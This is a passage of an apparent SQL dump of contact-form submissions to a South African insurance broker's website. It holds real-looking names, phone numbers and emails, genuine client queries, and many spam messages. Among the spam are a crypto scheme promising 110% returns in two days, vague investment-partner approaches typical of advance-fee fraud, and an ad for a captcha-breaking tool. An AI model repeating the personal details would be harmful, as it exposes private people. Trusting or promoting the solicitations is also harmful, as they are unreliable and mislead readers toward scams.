\r\nYour Website Title tag is not properly optimized.\r\nDescription tag is not properly optimized.\r\nGoogle publisher is missing.\r\nCanonical Tag Missing.\r\nRobots File is not optimized properly. \r\nHeading Tags Distribution is not proper (h1 to h6). \r\nSome Image Alt Tags are missing.\r\nWebpage content is not properly optimized. \r\nWeb page keywords density is low. \r\nKeyword distribution is not proper throughout the webpage.\r\nSocial Media presence is low.\r\nWebsite position in Google SERP is not so good. \r\nWebsite is not ranked on the Majestic top million.\r\nWebsite Alexa Rank is not good. \r\nWebsite page speed is slow.\r\n\r\nWe would be happy to solve all this issue on behalf of you to bring the website in good SERP position. \r\n\r\nDo let me know if you are interested then I will be happy to share our Methodologies and work details.\r\n\r\nI look forward to your mail.\r\n\r\nKind Regards,\r\nRamesh Agarwal\r\n\r\nSKYPE ID : seoserviceincheap\r\n\r\nDisclaimer: This is an advertisement and a promotional mail strictly on the guidelines of CAN-SPAM Act of 2003. We have clearly mentioned the source mail-id of this mail and the subject lines and they are in no way misleading in any form. We have found your mail address through our own efforts on the web search and not through any illegal way. If you find this mail unsolicited, please reply with \"unsubscribe\" in the subject line and we will take care that you do not receive any further promotional mail.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n'),(169,36,58,'Name','NAME','Text','Mary Johnson'),(170,36,59,'Contact Number','CONTACTNUMBER','Text','7890883589'),(171,36,64,'Email','EMAIL','Text','mery.zthinkers@gmail.com'),(172,36,69,'Comment','COMMENT','Textarea','Hi\r\n\r\nI am Mary;\r\n \r\nI was on your website. I am a business development manager of a renowned SEO, Web Design & Development Company. We are offering SEO, Web Design, Web Development, PPC, Mail Marketing, Graphics Design and complete Link Building Services from last 7 years.\r\n\r\nWe will be happy to help execute SEO & Web Design and Development projects at a much lower cost than what you have in house. No compromise on quality!\r\n\r\nWe have just gone through your website and found some issues, that are as follows - \r\n1. Your Website Title tag is not properly optimized.\r\n2. Description tag is not properly optimized.\r\n3. Google publisher is missing.\r\n4. Canonical Tag Missing.\r\n5. Robots File is not optimized properly. \r\n6. Heading Tags Distribution is not proper (h1 to h6). \r\n7. Some Image Alt Tags are missing.\r\n8. Webpage content is not properly optimized. \r\n9. Web page keywords density is low. \r\n10. Keyword distribution is not proper throughout the webpage.\r\n11. Social Media presence is low.\r\n12. Website position in Google SERP is not so good. \r\n13. Website is not ranked on the Majestic top million.\r\n14. Website Alexa Rank is not good. \r\n15. Website page speed is slow.\r\n\r\nWe would be happy to solve all this issue on behalf of you to bring the website in good SERP position. \r\n\r\nDo let me know if you are interested then I will be happy to share our Methodologies and work details.\r\n\r\nI look forward to your mail.\r\n\r\nKind Regards,\r\nMary Johnson\r\n\r\nDisclaimer: This is an advertisement and a promotional mail strictly on the guidelines of CAN-SPAM Act of 2003. We have clearly mentioned the source mail-id of this mail and the subject lines and they are in no way misleading in any form. We have found your mail address through our own efforts on the web search and not through any illegal way. If you find this mail unsolicited, please reply with \"unsubscribe\" in the subject line and we will take care that you do not receive any further promotional mail.\r\n'),(173,37,58,'Name','NAME','Text','test'),(174,37,59,'Contact Number','CONTACTNUMBER','Text','55555555'),(175,37,64,'Email','EMAIL','Text','test@test.com'),(176,37,74,'Department','DEPARTMENT','Select List','General'),(177,37,69,'Comment','COMMENT','Textarea','testing'),(178,38,58,'Name','NAME','Text','Louisblirm'),(179,38,59,'Contact Number','CONTACTNUMBER','Text','89632499979'),(180,38,64,'Email','EMAIL','Text','bitclaybtc@gmail.com'),(181,38,74,'Department','DEPARTMENT','Select List','General'),(182,38,69,'Comment','COMMENT','Textarea','The leader of the mobile blockchain industry in the global crypto investment platform Crypto MMM (Maximum Make Money) opens up new markets. \r\n \r\nInvestment program: \r\n \r\nProject currency: BTC. (Bitcoin) \r\nThe minimum investment amount is 0.0025 BTC. \r\nThe investment period is 2 days. \r\nMinimum profit is 110% \r\n \r\nFor example, invest 0.1 bitcoins today, in 2 days you will receive 0.11 bitcoins in your personal bitcoin wallet. \r\n \r\nMLM affiliate bonuses paid every day! \r\n \r\nBecome part of the Maximum Make Money project: https://www.crypto-mmm.com/?source=team'),(183,39,58,'Name','NAME','Text','Dylan'),(184,39,59,'Contact Number','CONTACTNUMBER','Text','0833958997'),(185,39,64,'Email','EMAIL','Text','development@polkadotdigital.co.za'),(186,39,74,'Department','DEPARTMENT','Select List','General'),(187,39,69,'Comment','COMMENT','Textarea','testing form'),(188,40,58,'Name','NAME','Text','test '),(189,40,59,'Contact Number','CONTACTNUMBER','Text','55555555'),(190,40,64,'Email','EMAIL','Text','digital@fenixmarketing.co.za'),(191,40,74,'Department','DEPARTMENT','Select List','General'),(192,40,69,'Comment','COMMENT','Textarea','testing'),(193,41,58,'Name','NAME','Text',' '),(194,41,64,'Email','EMAIL','Text','marketing@nomoregerms.co.za'),(195,41,74,'Department','DEPARTMENT','Select List','General'),(196,41,69,'Comment','COMMENT','Textarea','Hi there\r\n\r\nWe have launched a new website, www.nomoregerms.co.za on which you can order a wide range of hygiene products at wholesale pricing for your office. We supply amongst others:\r\n\r\n- sanitizers\r\n-commercial disinfectants\r\n-sanitising wet wipes\r\n-masks\r\n-gloves\r\n-protective face shields\r\n\r\nShould you wish to view our full range, please visit our website www.nomoregerms.co.za\r\nWe ship nationwide across South Africa\r\n\r\nKind regards\r\nJason\r\nwww.nomoregerms.co.za'),(197,42,58,'Name','NAME','Text','shami'),(198,42,59,'Contact Number','CONTACTNUMBER','Text','0837958549'),(199,42,64,'Email','EMAIL','Text','sgovender@ccbagroup.com'),(200,42,74,'Department','DEPARTMENT','Select List','General'),(201,42,69,'Comment','COMMENT','Textarea','earlr retirement'),(202,43,58,'Name','NAME','Text','Sadrian Naidoo'),(203,43,59,'Contact Number','CONTACTNUMBER','Text','0832985797'),(204,43,64,'Email','EMAIL','Text','sadrian.naidoo@gmail.com'),(205,43,74,'Department','DEPARTMENT','Select List','Healthcare'),(206,43,69,'Comment','COMMENT','Textarea','Good Day, I am looking to migrate my parents to na hospital plan from their current compucare medical insurance.\r\n\r\nPlease contact me. '),(207,44,58,'Name','NAME','Text','Rick Carlson'),(208,44,59,'Contact Number','CONTACTNUMBER','Text','8337766682'),(209,44,64,'Email','EMAIL','Text','RC6411@ProNovaPartners.com'),(210,44,74,'Department','DEPARTMENT','Select List','Appointments'),(211,44,69,'Comment','COMMENT','Textarea','First and foremost hope you, your family, and the rest of your team are well, safe, and healthy.\r\n\r\nProNova Partners would like to collaborate with you on the sale of your agency or book of business ASAP. Buyer demand is sky-high for agencies - we closed EVERY engagement we were hired for nationwide in 2019. Valuations are ridiculous {STILL}, our closing timeframes are short, and the good times I\'m afraid won\'t last forever. Interest rates will rise eventually, which will make it increasingly harder for Buyers to leverage up & pay 4-9x (PLUS) NET income on the best agencies. The time is now!\r\n\r\nIf you\'re interested in selling or just checking in on the valuation of your enterprise, please feel free to reach out to me directly to book an appointment {CONFIDENTIALLY} to explore further: https://www.calendly.com/rickcarlson\r\n\r\nOn our end - good news to start this somewhat interesting quarter we have on our hands, we still have 4 insurance agency closings (all under $2MM) scheduled for August and we\'re running low on salable inventory again. M&A marches onward despite these uncertain times. I\'d say generally we have less initial inbound buyers inquiring so for some folks deal paralysis has already set in, but the good news is that the \'conversion rate\' of buyers that are inquiring is high enough that the net amount of packages we\'re sending out is still better than pre-virus. Generally it has weeded out some of the tire-kickers, which is great. Just in case you were wondering~\r\n\r\nI\'d ideally like to take this month to begin a discussion on the sale of your Company & we can commence \'packaging\' this opportunity together so we can hopefully go to market later this month or next month. If you disagree, for whatever reason, hopefully just give me a follow up date that you think makes sense and I can circle back with you at that time. This has had varying degrees of impact on my prospective Sellers that are engaging us, so hopefully you\'re in the camp of minor current impact.\r\n\r\nBut why ProNova Partners?\r\n\r\n- We launched a campaign to sell a benefits book of business ($250k Gross) on 4/1, received 64 active buyers in 48 hours, sent out 133 packages as of 5/27, received 14 LOI\'s and accepted a bid on 5/27 at 2.5x gross closing on 8/10/20. Boooooom! \r\n- We have plenty of cash buyers that are active & decisive acquirers for good inventory. \r\n- We possess the network and the experiences to orchestrate virtually any transaction from initial consultation to the close of escrow in a timely manner.\r\n- We pay for upgraded advertising which in turn ensures maximum exposure to your business far beyond our company database of 38,000+ insurance agency groups looking for agencies to buy.\r\n- We specialize in highly-sensitive and confidential sales and recognize its importance, therefore all buyers have an NDA on file with us.\r\n- We work together with our highly skilled team to produce top-tier marketing materials and pitch books that impel buyers to write offers.\r\n- We are experts in valuation - by applying the correct valuation strategy to your firm, we can therefore negotiate the highest possible price for your business.\r\n- We understand the importance of time to close, and considering all of the above we also have an average 90 days to close for our buyers / sellers.\r\n- We are a success fee firm, unless we close the transaction for you, there is no charge to you.\r\n\r\nWhat\'s your magic #? What\'s your exit plan strategy? What are you waiting for?\r\n\r\nIf you\'re interested in buying - just send me an email and we\'ll add you to our marketing platform so we\'ll keep you apprised of our future agency deal flow. We bring 2-5 deals to market per month on average.\r\n\r\nYou can also bookmark our website, https://www.pronovapartners.com/engagements/ to check in on future deals anytime.\r\n\r\nYou can also hire us to \"go out and get something\" if you have a specific set of zip codes or other criteria where you want us to complete a specific, proactive & dedicated M&A process for you. Just reply back and we can discuss further anytime. Thanks!\r\n\r\nCheers,\r\n\r\n-Rick.\r\n-- \r\nRick Carlson\r\nCEO\r\nProNova Partners\r\n825 Wilshire Blvd., Suite 536\r\nSanta Monica, CA 90401\r\nPhone: 833-776-6682\r\nEmail: RC6411@ProNovaPartners.com\r\nWeb: https://www.ProNovaPartners.com\r\n_______________________________________\r\n\r\nThe information in this email is confidential and intended solely for the recipients listed. The content and subject of this email may be subject to confidentiality agreements and should be treated with appropriate care. Access or distribution to anyone other than the original recipients and parties to the confidentiality agreement is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution, or any action taken, or omitted to be taken in reliance on it, is prohibited and may be unlawful. All information contained herein was furnished by either buyer or seller. Broker or agent has not and will not verify the accuracy or completeness of this information.\r\n'),(212,45,64,'Email','EMAIL','Text','gary@netpi.co.za'),(213,45,74,'Department','DEPARTMENT','Select List','General'),(214,45,69,'Comment','COMMENT','Textarea','HI there\r\n\r\nCame across your website & just wanted to let you know to checkout netpi.co.za - our amazing new online game where you can play free and win some amazing prizes monthly.\r\n\r\nSimply visit netpi.co.za & solve the clues, and you\'ll be in the draw to win awesome prizes.\r\nOur August 2020 prizes are:\r\n- an awesome SMEG kettle\r\n- a Roberto Cavalli fragrance set\r\n- a R1000 Woolworths voucher\r\n\r\nHope to see you playing online :)\r\n\r\nKind regards\r\nGary\r\nwww.netpi.co.za'),(215,46,58,'Name','NAME','Text','Shaunbed'),(216,46,59,'Contact Number','CONTACTNUMBER','Text','88735337841'),(217,46,64,'Email','EMAIL','Text','no-replyUnmasia@gmail.com'),(218,46,74,'Department','DEPARTMENT','Select List','General'),(219,46,69,'Comment','COMMENT','Textarea','Hi! smithandsmith.co.za \r\n \r\nDid yоu knоw thаt it is pоssiblе tо sеnd prоpоsаl pеrfесtly lеgitimаtе wаy? \r\nWе prеsеntаtiоn а nеw wаy оf sеnding businеss оffеr thrоugh fееdbасk fоrms. Suсh fоrms аrе lосаtеd оn mаny sitеs. \r\nWhеn suсh prоpоsаls аrе sеnt, nо pеrsоnаl dаtа is usеd, аnd mеssаgеs аrе sеnt tо fоrms spесifiсаlly dеsignеd tо rесеivе mеssаgеs аnd аppеаls. \r\nаlsо, mеssаgеs sеnt thrоugh соmmuniсаtiоn Fоrms dо nоt gеt intо spаm bесаusе suсh mеssаgеs аrе соnsidеrеd impоrtаnt. \r\nWе оffеr yоu tо tеst оur sеrviсе fоr frее. Wе will sеnd up tо 50,000 mеssаgеs fоr yоu. \r\nThе соst оf sеnding оnе milliоn mеssаgеs is 49 USD. \r\n \r\nThis lеttеr is сrеаtеd аutоmаtiсаlly. Plеаsе usе thе соntасt dеtаils bеlоw tо соntасt us. \r\n \r\nContact us. \r\nTelegram - @FeedbackMessages \r\nSkype live:contactform_18 \r\nWhatsApp - +375259112693'),(220,47,58,'Name','NAME','Text','Leney Stipp'),(221,47,59,'Contact Number','CONTACTNUMBER','Text','0842540686'),(222,47,64,'Email','EMAIL','Text','gatskopmamma@gmail.com'),(223,47,74,'Department','DEPARTMENT','Select List','Healthcare'),(224,47,69,'Comment','COMMENT','Textarea','GAP Cover AMBL 0024358\r\nPlease contact me urgently re GAP cover. My e-mail address changed and I used to contact the Paarl Branch for claims and queries on 021 872 1515 - My contact was Hesca v/d Berg\r\n\r\nThank you\r\n\r\nKind regards\r\nLeney Stipp\r\n084 254 0686\r\n\r\n'),(225,48,58,'Name','NAME','Text','Eric Jones'),(226,48,64,'Email','EMAIL','Text','ericjonesonline@outlook.com'),(227,48,74,'Department','DEPARTMENT','Select List','Financial Planning'),(228,48,69,'Comment','COMMENT','Textarea','Hey, this is Eric and I ran across smithandsmith.co.za a few minutes ago.\r\n\r\nLooks great… but now what?\r\n\r\nBy that I mean, when someone like me finds your website – either through Search or just bouncing around – what happens next? Do you get a lot of leads from your site, or at least enough to make you happy?\r\n\r\nHonestly, most business websites fall a bit short when it comes to generating paying customers. Studies show that 70% of a site’s visitors disappear and are gone forever after just a moment.\r\n\r\nHere’s an idea…\r\n \r\nHow about making it really EASY for every visitor who shows up to get a personal phone call you as soon as they hit your site…\r\n \r\nYou can –\r\n \r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It signals you the moment they let you know they’re interested – so that you can talk to that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE http://www.talkwithwebvisitors.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nYou’ll be amazed - the difference between contacting someone within 5 minutes versus a half-hour or more later could increase your results 100-fold.\r\n\r\nIt gets even better… once you’ve captured their phone number, with our new SMS Text With Lead feature, you can automatically start a text (SMS) conversation.\r\n \r\nThat way, even if you don’t close a deal right away, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nPretty sweet – AND effective.\r\n\r\nCLICK HERE http://www.talkwithwebvisitors.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE http://www.talkwithwebvisitors.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithwebvisitors.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(229,49,58,'Name','NAME','Text','Sandisile'),(230,49,59,'Contact Number','CONTACTNUMBER','Text','0783083180'),(231,49,64,'Email','EMAIL','Text','sandisilenovember@gmail.com'),(232,49,74,'Department','DEPARTMENT','Select List','General'),(233,49,69,'Comment','COMMENT','Textarea','Please call back urgently'),(234,50,58,'Name','NAME','Text','JannaGycle'),(235,50,59,'Contact Number','CONTACTNUMBER','Text','83426479582'),(236,50,64,'Email','EMAIL','Text','roikvlad@foxmaily.com'),(237,50,74,'Department','DEPARTMENT','Select List','General'),(238,50,69,'Comment','COMMENT','Textarea','как исключение, скачать музмо новинки <a href=\"https://muzground.ru/song/%D0%B8%D0%BD%D0%BD%D0%B0+%D0%B2%D0%B0%D0%BB%D1%8C%D1%82%D0%B5%D1%80+2020\">слушать песни новые 2020 анна вайтер</a>'),(239,51,58,'Name','NAME','Text','Eric Jones'),(240,51,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(241,51,74,'Department','DEPARTMENT','Select List','Healthcare'),(242,51,69,'Comment','COMMENT','Textarea','Hey, my name’s Eric and for just a second, imagine this…\r\n\r\n- Someone does a search and winds up at smithandsmith.co.za.\r\n\r\n- They hang out for a minute to check it out. “I’m interested… but… maybe…”\r\n\r\n- And then they hit the back button and check out the other search results instead. \r\n\r\n- Bottom line – you got an eyeball, but nothing else to show for it.\r\n\r\n- There they go.\r\n\r\nThis isn’t really your fault – it happens a LOT – studies show 7 out of 10 visitors to any site disappear without leaving a trace.\r\n\r\nBut you CAN fix that.\r\n\r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It lets you know right then and there – enabling you to call that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE https://talkwithwebvisitors.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nTime is money when it comes to connecting with leads – the difference between contacting someone within 5 minutes versus 30 minutes later can be huge – like 100 times better!\r\n\r\nPlus, now that you have their phone number, with our new SMS Text With Lead feature you can automatically start a text (SMS) conversation… so even if you don’t close a deal then, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nStrong stuff.\r\n\r\nCLICK HERE https://talkwithwebvisitors.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE https://talkwithwebvisitors.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithwebvisitors.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(243,52,58,'Name','NAME','Text','masha.tikhonovvama7z'),(244,52,59,'Contact Number','CONTACTNUMBER','Text','83129188241'),(245,52,64,'Email','EMAIL','Text','alola.tixonofarof0e@gmail.com'),(246,52,74,'Department','DEPARTMENT','Select List','General'),(247,52,69,'Comment','COMMENT','Textarea',' Perfect update of captchas recognition software \"XRumer 19.0 + XEvil\": \r\n \r\nCaptchas regignizing of Google (ReCaptcha-2 and ReCaptcha-3), Facebook, BitFinex, Microsoft, Mail.Ru, SolveMedia, Hydra, \r\nand more than 12000 another categories of captcha, \r\nwith highest precision (80..100%) and highest speed (100 img per second). \r\nYou can use XEvil 5.0 with any most popular SEO/SMM software: iMacros, XRumer, SERP Parser, GSA SER, RankerX, ZennoPoster, Scrapebox, Senuke, FaucetCollector and more than 100 of other software. \r\n \r\nInterested? You can find a lot of demo videos about XEvil in YouTube. \r\n \r\nFREE DEMO AVAILABLE! \r\n \r\nGood luck! \r\nP.S. A Huge Discount -30% for XEvil full version until 15 Jan is AVAILABLE! :) \r\n \r\n \r\nXEvil Net'),(248,53,58,'Name','NAME','Text','DonaldDot'),(249,53,59,'Contact Number','CONTACTNUMBER','Text','84481384924'),(250,53,64,'Email','EMAIL','Text','no-replyUnmasia@gmail.com'),(251,53,74,'Department','DEPARTMENT','Select List','General'),(252,53,69,'Comment','COMMENT','Textarea','Good day! smithandsmith.co.za \r\n \r\nDid you know that it is possible to send letter entirely legal? \r\nWe providing a new unique way of sending proposal through contact forms. Such forms are located on many sites. \r\nWhen such proposals are sent, no personal data is used, and messages are sent to forms specifically designed to receive messages and appeals. \r\nalso, messages sent through communication Forms do not get into spam because such messages are considered important. \r\nWe offer you to test our service for free. We will send up to 50,000 messages for you. \r\nThe cost of sending one million messages is 49 USD. \r\n \r\nThis letter is created automatically. Please use the contact details below to contact us. \r\n \r\nContact us. \r\nTelegram - @FeedbackMessages \r\nSkype live:contactform_18 \r\nWhatsApp - +375259112693'),(253,54,58,'Name','NAME','Text','Jacques'),(254,54,59,'Contact Number','CONTACTNUMBER','Text','0662490030'),(255,54,64,'Email','EMAIL','Text','jacques.o@outlook.com'),(256,54,74,'Department','DEPARTMENT','Select List','Healthcare'),(257,54,69,'Comment','COMMENT','Textarea','Hope you are doing well and happy belated new year.\r\n\r\nI am looking for medical aid again, though something that has hospital cover and some day to day benefits. Even if it is network hospitals that would be suitable as well.\r\n\r\nThen my partner is looking for something as well for her and her daughter as well.\r\n\r\nWould you be able to assist with this?\r\n\r\nI did email Shirley, though I think it might not have delivered as yet.'),(258,55,58,'Name','NAME','Text','James Lambert'),(259,55,59,'Contact Number','CONTACTNUMBER','Text','86449184924'),(260,55,64,'Email','EMAIL','Text','lambertj283@gmail.com'),(261,55,74,'Department','DEPARTMENT','Select List','General'),(262,55,69,'Comment','COMMENT','Textarea','Good day \r\n \r\nI`m seeking a reputable company/individual to partner with in a manner that would benefit both parties. The project is worth $24 Million so if interested, kindly contact me through this email jameslambert@lambert-james.com for clarification. \r\n \r\nI await your response. \r\n \r\nThanks, \r\n \r\nJames Lambert'),(263,56,58,'Name','NAME','Text','Eric Jones'),(264,56,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(265,56,74,'Department','DEPARTMENT','Select List','General'),(266,56,69,'Comment','COMMENT','Textarea','Hello, my name’s Eric and I just ran across your website at smithandsmith.co.za...\r\n\r\nI found it after a quick search, so your SEO’s working out…\r\n\r\nContent looks pretty good…\r\n\r\nOne thing’s missing though…\r\n\r\nA QUICK, EASY way to connect with you NOW.\r\n\r\nBecause studies show that a web lead like me will only hang out a few seconds – 7 out of 10 disappear almost instantly, Surf Surf Surf… then gone forever.\r\n\r\nI have the solution:\r\n\r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. You’ll know immediately they’re interested and you can call them directly to TALK with them - literally while they’re still on the web looking at your site.\r\n\r\nCLICK HERE http://talkwithcustomer.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works and even give it a try… it could be huge for your business.\r\n\r\nPlus, now that you’ve got that phone number, with our new SMS Text With Lead feature, you can automatically start a text (SMS) conversation pronto… which is so powerful, because connecting with someone within the first 5 minutes is 100 times more effective than waiting 30 minutes or more later.\r\n\r\nThe new text messaging feature lets you follow up regularly with new offers, content links, even just follow up notes to build a relationship.\r\n\r\nEverything I’ve just described is extremely simple to implement, cost-effective, and profitable.\r\n \r\nCLICK HERE http://talkwithcustomer.com to discover what Talk With Web Visitor can do for your business, potentially converting up to 100X more eyeballs into leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE http://talkwithcustomer.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithcustomer.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(267,57,58,'Name','NAME','Text','Stuart Crocker'),(268,57,59,'Contact Number','CONTACTNUMBER','Text','84249961978'),(269,57,64,'Email','EMAIL','Text','stuartcrocker10@gmail.com'),(270,57,74,'Department','DEPARTMENT','Select List','General'),(271,57,69,'Comment','COMMENT','Textarea','My name is Stuart Crocker, I am a Financial Consultant of Proquest Consulting limited . I have a client who has an interest in Investing in your country into a Joint Venture / Partnership. He has funds available meant for investment. \r\n \r\nPlease contact me if you are interested. \r\n \r\nRegards, \r\nStuart Crocker \r\nProquest Consulting limited \r\nEmail: staurtcrocker544gmail.com'),(272,58,58,'Name','NAME','Text','Max Williams'),(273,58,59,'Contact Number','CONTACTNUMBER','Text','7077060205'),(274,58,64,'Email','EMAIL','Text','siterank4@gmail.com'),(275,58,74,'Department','DEPARTMENT','Select List','General'),(276,58,69,'Comment','COMMENT','Textarea','Hello and Good Day\r\nI am Max (Jitesh chauhan) Marketing Manager with a reputable online marketing company based in India.\r\nWe can fairly quickly promote your website to the top of the search rankings with no long term contracts!\r\nWe can place your website on top of the Natural Listings on Google, Yahoo and MSN. Our Search Engine Optimization team delivers more top rankings than anyone else and we can prove it. We do not use \"link farms\" or \"black hat\" methods that Google and the other search engines frown upon and can use to de-list or ban your site. The techniques are proprietary, involving some valuable closely held trade secrets.\r\nWe would be happy to send you a proposal using the top search phrases for your area of expertise. Please contact me at your convenience so we can start saving you some money.\r\nIn order for us to respond to your request for information, please include your company’s website address (mandatory) and or phone number.\r\nSo let me know if you would like me to mail you more details or schedule a call. We\'ll be pleased to serve you.\r\nI look forward to your mail.\r\nThanks and Regards'),(277,59,58,'Name','NAME','Text','Eric Jones'),(278,59,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(279,59,74,'Department','DEPARTMENT','Select List','Appointments'),(280,59,69,'Comment','COMMENT','Textarea','Hey, my name’s Eric and for just a second, imagine this…\r\n\r\n- Someone does a search and winds up at smithandsmith.co.za.\r\n\r\n- They hang out for a minute to check it out. “I’m interested… but… maybe…”\r\n\r\n- And then they hit the back button and check out the other search results instead. \r\n\r\n- Bottom line – you got an eyeball, but nothing else to show for it.\r\n\r\n- There they go.\r\n\r\nThis isn’t really your fault – it happens a LOT – studies show 7 out of 10 visitors to any site disappear without leaving a trace.\r\n\r\nBut you CAN fix that.\r\n\r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It lets you know right then and there – enabling you to call that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE http://talkwithcustomer.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nTime is money when it comes to connecting with leads – the difference between contacting someone within 5 minutes versus 30 minutes later can be huge – like 100 times better!\r\n\r\nPlus, now that you have their phone number, with our new SMS Text With Lead feature you can automatically start a text (SMS) conversation… so even if you don’t close a deal then, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nStrong stuff.\r\n\r\nCLICK HERE http://talkwithcustomer.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE http://talkwithcustomer.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithcustomer.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(281,60,58,'Name','NAME','Text','Linda Miller'),(282,60,64,'Email','EMAIL','Text','lindamillerleads@gmail.com'),(283,60,74,'Department','DEPARTMENT','Select List','General'),(284,60,69,'Comment','COMMENT','Textarea','Hi smithandsmith.co.za Owner,\r\n\r\nDo you want to know the Secrets To Mastering Internet Lead Conversion?\r\n\r\nI spent the last 10+ years generating, calling and closing Internet leads. I will be sharing my decade long conversion code for you to copy during this new, free webinar!\r\nDuring the webinar, I will show you:\r\n\r\nEvery business needs to capture more leads, create more appointments, and close more deals.\r\n\r\nIf you commit to mastering the content in this session, you will earn more money immediately– not in six months or a year, but literally as soon as you put your new knowledge to work. I have used this method on 1,000\'s of Internet leads of all price points. \r\n\r\nIf you want Internet leads, I have the key to CONVERTING them. Hope you can make it... https://TalkWithWebTraffic.com/Webinar\r\n\r\nIf getting more Hot Phone Leads is a part of your business plan (and why wouldn\'t it be?), I\'ve got great news for you.\r\n\r\n1. 12 ways to generate seller leads\r\n2. How to get seller leads on the phone\r\n3. What to say on the phone so you get instant sales\r\n4. The Key to SMS Marketing\r\n5 Never Cold Call Again\r\n6. Better leads = Faster conversions\r\n7. The four keys to inside sales success\r\n8. The 10 steps to a perfect sales call with an Internet lead\r\n\r\nMore than 7,000 people have already registered. The last time I did a webinar with Top Producers, hundreds of people got locked out and could only watch the replay. Get your spot now and tune in early!\r\n\r\n==> Save my spot https://TalkWithWebTraffic.com/Webinar\r\n\r\nWe\'ve become obsessed with making sure our clients are converting the leads we generate for them. \r\n\r\nHow much are you getting back in commissions compared to how much are you spending on advertising? But what is even better than a great ROI is a quick ROI. During this live webinar I will show you how we can help you generate higher quality leads that are easier to convert, fast.\r\n\r\n==> Register at https://TalkWithWebTraffic.com/Webinar\r\n\r\nYour #1 Fan, \r\nLinda Miller\r\nBe there or be square.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithwebtraffic.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(285,61,58,'Name','NAME','Text','Eric Jones'),(286,61,64,'Email','EMAIL','Text','eric.jones.z.mail@gmail.com'),(287,61,74,'Department','DEPARTMENT','Select List','Short Term Insurance'),(288,61,69,'Comment','COMMENT','Textarea','Hey, my name’s Eric and for just a second, imagine this…\r\n\r\n- Someone does a search and winds up at smithandsmith.co.za.\r\n\r\n- They hang out for a minute to check it out. “I’m interested… but… maybe…”\r\n\r\n- And then they hit the back button and check out the other search results instead. \r\n\r\n- Bottom line – you got an eyeball, but nothing else to show for it.\r\n\r\n- There they go.\r\n\r\nThis isn’t really your fault – it happens a LOT – studies show 7 out of 10 visitors to any site disappear without leaving a trace.\r\n\r\nBut you CAN fix that.\r\n\r\nTalk With Web Visitor is a software widget that’s works on your site, ready to capture any visitor’s Name, Email address and Phone Number. It lets you know right then and there – enabling you to call that lead while they’re literally looking over your site.\r\n\r\nCLICK HERE http://talkwithcustomer.com to try out a Live Demo with Talk With Web Visitor now to see exactly how it works.\r\n\r\nTime is money when it comes to connecting with leads – the difference between contacting someone within 5 minutes versus 30 minutes later can be huge – like 100 times better!\r\n\r\nPlus, now that you have their phone number, with our new SMS Text With Lead feature you can automatically start a text (SMS) conversation… so even if you don’t close a deal then, you can follow up with text messages for new offers, content links, even just “how you doing?” notes to build a relationship.\r\n\r\nStrong stuff.\r\n\r\nCLICK HERE http://talkwithcustomer.com to discover what Talk With Web Visitor can do for your business.\r\n\r\nYou could be converting up to 100X more leads today!\r\n\r\nEric\r\nPS: Talk With Web Visitor offers a FREE 14 days trial – and it even includes International Long Distance Calling. \r\nYou have customers waiting to talk with you right now… don’t keep them waiting. \r\nCLICK HERE http://talkwithcustomer.com to try Talk With Web Visitor now.\r\n\r\nIf you\'d like to unsubscribe click here http://talkwithcustomer.com/unsubscribe.aspx?d=smithandsmith.co.za\r\n'),(289,62,58,'Name','NAME','Text','JacobTOr'),(290,62,59,'Contact Number','CONTACTNUMBER','Text','89642661678'),(291,62,64,'Email','EMAIL','Text','bundesdrugs@gmail.com'),(292,62,74,'Department','DEPARTMENT','Select 